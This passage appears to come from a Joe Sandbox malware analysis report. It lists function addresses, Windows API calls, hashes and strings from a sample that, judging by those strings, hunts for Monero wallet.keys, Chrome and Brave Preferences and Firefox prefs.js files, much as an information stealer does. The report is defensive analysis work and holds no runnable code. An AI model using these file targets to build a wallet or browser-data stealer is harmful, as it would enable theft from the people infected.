                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 9116b213d313c2d223666281bb029c771610dfb129d70c1ee53501bdd556cc11
                      • Instruction ID: cc1e202cf208ec8730f0801b544ecf1d5a01fede34e81c68acf36c938e360b1d
                      • Opcode Fuzzy Hash: 9116b213d313c2d223666281bb029c771610dfb129d70c1ee53501bdd556cc11
                      • Instruction Fuzzy Hash: B7A124B2A14218ABDB24DF64DC89FEE7378FF84301F444588B61D96181EB759B84CF62
                      Function 0073BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00750B32,00750B2B,00000000,?,?,?,007513F4,00750B2A), ref: 0073BEF5
                      • StrCmpCA.SHLWAPI(?,007513F8), ref: 0073BF4D
                      • StrCmpCA.SHLWAPI(?,007513FC), ref: 0073BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0073C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 3be231c742ed8a46bcf7167ab16ac42528d248c3020e47ccef67d364d070268e
                      • Instruction ID: 5a89ec39a60c5ad6776aae47721bd1272b8d6176c4b16b93317c896cdd100e9f
                      • Opcode Fuzzy Hash: 3be231c742ed8a46bcf7167ab16ac42528d248c3020e47ccef67d364d070268e
                      • Instruction Fuzzy Hash: E6425772950104F7EB15FB70DD9AEED737DAF94300F404568B90AA6181EF38AB49CB92
                      Function 00744910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 0074492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00744943
                      • StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                      • StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                      • FindClose.KERNEL32(000000FF), ref: 00744B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: dff5af834e2e3645a4c380bbe05a850f2d0c0840ffa1091b9a226f5569c48ded
                      • Instruction ID: 2311530cd7f3242952efb01b886909b6d6666fd765cf0b6a47f5ad3c9535c3e4
                      • Opcode Fuzzy Hash: dff5af834e2e3645a4c380bbe05a850f2d0c0840ffa1091b9a226f5569c48ded
                      • Instruction Fuzzy Hash: FE6148B2914218ABCB24EBA0DC49FEE737CBB88701F044588B50D96141EB75EB85DF91
                      Function 00744570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00744580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00744587
                      • wsprintfA.USER32 ref: 007445A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 007445BD
                      • StrCmpCA.SHLWAPI(?,00750FC4), ref: 007445EB
                      • StrCmpCA.SHLWAPI(?,00750FC8), ref: 00744601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0074468B
                      • FindClose.KERNEL32(000000FF), ref: 007446A0
                      • lstrcat.KERNEL32(?,013EE310), ref: 007446C5
                      • lstrcat.KERNEL32(?,013ED5B8), ref: 007446D8
                      • lstrlen.KERNEL32(?), ref: 007446E5
                      • lstrlen.KERNEL32(?), ref: 007446F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: 261d3c6892ead980f87c37c67f7dbd465828ababd1ff7b8e4fb06ff9a8112e74
                      • Instruction ID: bc1a7e68fa6e2b7b0b4e8871f20ffa9fa5ea572f95fec94c85e5096bb40e766b
                      • Opcode Fuzzy Hash: 261d3c6892ead980f87c37c67f7dbd465828ababd1ff7b8e4fb06ff9a8112e74
                      • Instruction Fuzzy Hash: EF5168B2954218ABCB64EB70DC89FED737CAB94300F404588F61D96191EB789BC4DF92
                      Function 00743EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 00743EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00743EDA
                      • StrCmpCA.SHLWAPI(?,00750FAC), ref: 00743F08
                      • StrCmpCA.SHLWAPI(?,00750FB0), ref: 00743F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0074406C
                      • FindClose.KERNEL32(000000FF), ref: 00744081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: b7f79e1633e956341a90d92c4339554380333ff70c51b63e4443695a0e61d45c
                      • Instruction ID: 8f2ef8c6c3554a8a5a9394c48ebae0e6a2bd1cd05bcc65438d7ec523644f655e
                      • Opcode Fuzzy Hash: b7f79e1633e956341a90d92c4339554380333ff70c51b63e4443695a0e61d45c
                      • Instruction Fuzzy Hash: 7F514BB2914218EBCB24FBB0DC49EED737CBB94300F404588B65D96141DB79AB85DF91
                      Function 0073ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 0073ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0073ED55
                      • StrCmpCA.SHLWAPI(?,00751538), ref: 0073EDAB
                      • StrCmpCA.SHLWAPI(?,0075153C), ref: 0073EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0073F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 23722c655a24382802fb93bc8222b32c54d36af3d35596fc9500d9544e84a1d8
                      • Instruction ID: e3e28e255a7afee9c9240c86800331f2da54a1659a9b1c24e3c6312d3b795ef8
                      • Opcode Fuzzy Hash: 23722c655a24382802fb93bc8222b32c54d36af3d35596fc9500d9544e84a1d8
                      • Instruction Fuzzy Hash: 30E1FF72951118EAFB55FB60DC56EEE737CAF54300F4041A9B50A62092EF386F8ACF52
                      Function 0073F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007515B8,00750D96), ref: 0073F71E
                      • StrCmpCA.SHLWAPI(?,007515BC), ref: 0073F76F
                      • StrCmpCA.SHLWAPI(?,007515C0), ref: 0073F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0073FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 22777a582ca6bae828d7c81e6555fdad5cea125cae5ca008191d386da95ad4d5
                      • Instruction ID: 948bdc1b26fad37a3a4c2b7bfea590bf62f7bfd5c490e62c9f730e4f416462ae
                      • Opcode Fuzzy Hash: 22777a582ca6bae828d7c81e6555fdad5cea125cae5ca008191d386da95ad4d5
                      • Instruction Fuzzy Hash: 53B13671950108EBEB25FF60DC5ABEE7379AF54300F4085A8E40A96152EF386B49CF92
                      Function 007316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0075510C,?,?,?,007551B4,?,?,00000000,?,00000000), ref: 00731923
                      • StrCmpCA.SHLWAPI(?,0075525C), ref: 00731973
                      • StrCmpCA.SHLWAPI(?,00755304), ref: 00731989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00731D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00731DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00731E20
                      • FindClose.KERNEL32(000000FF), ref: 00731E32
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: a2f38f4283c71340c8a087c516c2b6c9af6f531c2cea88d400fc751084b193d7
                      • Instruction ID: 310d5e9f3f078336d410ec2ea9a728133d41dcd7168fc3eb74b0810e3ea8a96e
                      • Opcode Fuzzy Hash: a2f38f4283c71340c8a087c516c2b6c9af6f531c2cea88d400fc751084b193d7
                      • Instruction Fuzzy Hash: E3120071950118FBEB15FB60CC9AAEE737CAF54300F4145A9B50A62091EF786F89CF91
                      Function 0073DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00750C2E), ref: 0073DE5E
                      • StrCmpCA.SHLWAPI(?,007514C8), ref: 0073DEAE
                      • StrCmpCA.SHLWAPI(?,007514CC), ref: 0073DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0073E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 0428cc7f4dddb61bd65cfa309a8ae118e80317d9a65002f97434458490155854
                      • Instruction ID: 43ad3de068561cc51e74635bd97923e93ba1983d4f4b7ed39cb7853d7c6a3f7a
                      • Opcode Fuzzy Hash: 0428cc7f4dddb61bd65cfa309a8ae118e80317d9a65002f97434458490155854
                      • Instruction Fuzzy Hash: 39F1BF71954118EAEB16EB60DC99EEE737CFF54304F8141E9A40A62091EF386F89CF52
                      Function 0073DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007514B0,00750C2A), ref: 0073DAEB
